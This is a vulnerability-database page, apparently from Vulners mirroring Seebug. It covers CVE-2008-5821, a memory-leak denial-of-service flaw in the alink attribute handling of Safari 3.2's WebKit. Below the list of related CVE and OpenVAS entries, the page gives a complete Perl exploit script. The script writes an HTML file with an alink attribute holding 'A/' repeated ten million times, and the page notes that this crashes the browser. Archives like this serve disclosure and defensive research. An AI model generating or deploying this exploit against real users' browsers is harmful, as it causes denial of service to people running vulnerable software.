Lucene search
K

Apple Safari WebKit alink属性内存泄露拒绝服务漏洞

🗓️ 05 Jan 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 33 Views

Apple Safari WebKit alink属性内存泄露拒绝服务漏洞 exploitatio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5821
1 Jan 200900:00
circl
CVE
CVE-2008-5821
2 Jan 200919:00
cve
Cvelist
CVE-2008-5821
2 Jan 200919:00
cvelist
NVD
CVE-2008-5821
2 Jan 200919:30
nvd
OpenVAS
Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability
13 Jan 200900:00
openvas
OpenVAS
Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability
13 Jan 200900:00
openvas
Prion
Hardcoded credentials
2 Jan 200919:30
prion

                                                #!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY
# Memory leaks are common in browsers.. tested on Vista SP1
# Compliments of bf2

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n";

}

$head = "<html>" . "\n";
$trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n";
$foot = "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation